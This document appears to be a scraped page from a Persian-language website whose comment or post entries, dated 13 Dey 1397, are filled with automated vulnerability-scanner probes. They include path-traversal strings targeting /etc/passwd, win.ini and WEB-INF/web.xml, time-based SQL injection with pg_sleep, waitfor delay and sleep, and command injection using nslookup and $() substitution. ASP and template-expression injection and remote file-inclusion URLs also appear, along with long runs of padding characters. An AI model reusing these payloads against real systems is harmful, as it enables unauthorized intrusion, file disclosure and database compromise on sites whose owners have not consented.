\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ 13 دی 1397

1


1 13 دی 1397

1


) 13 دی 1397

1


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini 13 دی 1397

1


../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 13 دی 1397

1


1 13 دی 1397

1


..\..\..\..\..\..\..\..\windows\win.ini 13 دی 1397

1


1 13 دی 1397

1


................windowswin.ini 13 دی 1397

1


1 13 دی 1397

1


../../../../../../../../../../windows/win.ini.jpg 13 دی 1397

1


../../../../../../../../../../boot.ini 13 دی 1397

1


1 13 دی 1397

1


../../../../../../../../../../windows/win.ini 13 دی 1397

1


WEB-INF\web.xml 13 دی 1397

1


1 13 دی 1397

1


/WEB-INF/web.xml 13 دی 1397

1


1 13 دی 1397

1


WEB-INF/web.xml 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


/\../\../\../\../\../\../\../etc/passwd 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


file:///etc/passwd 13 دی 1397

1


1 13 دی 1397

1&n977368=v993474


1 13 دی 1397

1


invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

testasp.vulnweb.com


1 13 دی 1397

http://testasp.vulnweb.com/t/fit.txt?.jpg


1 13 دی 1397

1


1 13 دی 1397

Http://testasp.vulnweb.com/t/fit.txt


1 13 دی 1397

1some_inexistent_file_with_long_name.jpg


1 13 دی 1397

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1&n934150=v933496 13 دی 1397

1


1 13 دی 1397

1


testasp.vulnweb.com 13 دی 1397

1


http://testasp.vulnweb.com/t/fit.txt?.jpg 13 دی 1397

1


Http://testasp.vulnweb.com/t/fit.txt 13 دی 1397

1


1some_inexistent_file_with_long_name.jpg 13 دی 1397

1


1 13 دی 1397

${9999975+9999209}


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg 13 دی 1397

1


${10000286+9999963} 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


LDCMrEIz'));select pg_sleep(6); -- 13 دی 1397

1


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 13 دی 1397

1


../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 13 دی 1397

1


NNLqT5wO');select pg_sleep(3); -- 13 دی 1397

1


/.././.././.././.././.././.././.././../etc/./passwd%00 13 دی 1397

1


R4iR03wj';select pg_sleep(3); -- 13 دی 1397

1


%2fetc%2fpasswd 13 دی 1397

1


-1));select pg_sleep(3); -- 13 دی 1397

1


-1);select pg_sleep(9); -- 13 دی 1397

1


/etc/passwd 13 دی 1397

1


.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 13 دی 1397

1


-1;select pg_sleep(9); -- 13 دی 1397

1


/../..//../..//../..//../..//../..//etc/passwd.jpg 13 دی 1397

1


xUm9CTJU'; waitfor delay '0:0:9' -- 13 دی 1397

1


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 13 دی 1397

1


../../../../../../../../../../etc/passwd.jpg 13 دی 1397

1


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 13 دی 1397

1


1 13 دی 1397

&nslookup z8l8ALwZ&'\"`0&nslookup z8l8ALwZ&`'


../../../../../../../../../../../../../../../proc/version 13 دی 1397

1


../../../../../../../../../../etc/passwd 13 دی 1397

1


1 waitfor delay '0:0:9' -- 13 دی 1397

1


-1); waitfor delay '0:0:6' -- 13 دی 1397

1


1 13 دی 1397

$(nslookup Me6d191c)


-1; waitfor delay '0:0:6' -- 13 دی 1397

1


1 13 دی 1397

"+response.write(9168488*9646136)+"


1 13 دی 1397

'+response.write(9168488*9646136)+'


(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/ 13 دی 1397

1


1 13 دی 1397

response.write(9168488*9646136)


(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ 13 دی 1397

1


if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ 13 دی 1397

1


1 13 دی 1397

q0EMAg1E


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

set|set&set


-1" OR 2+414-414-1=0+0+0+1 -- 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


"+response.write(9043564*9000119)+" 13 دی 1397

1


1 13 دی 1397

1


-1' OR 2+522-522-1=0+0+0+1 or 'fmB4Kftg'=' 13 دی 1397

1


zGg1RhBh 13 دی 1397

1


-1' OR 2+525-525-1=0+0+0+1 -- 13 دی 1397

1


1 13 دی 1397

1


&nslookup cnpYZybq&'\"`0&nslookup cnpYZybq&`' 13 دی 1397

1


-1 OR 2+409-409-1=0+0+0+1 13 دی 1397

1


-1 OR 2+376-376-1=0+0+0+1 -- 13 دی 1397

1


$(nslookup 7vZ9Mjtl) 13 دی 1397

1


2jVJGcUK 13 دی 1397

1


'+response.write(9043564*9000119)+' 13 دی 1397

1


1 13 دی 1397

1


set|set&set 13 دی 1397

1


response.write(9043564*9000119) 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


بازدید امروز: 1684

بازدید هفته: 6759

بازدید ماه: 34584

کلیه حقوق سایت متعلق به مدیر سایت میباشد.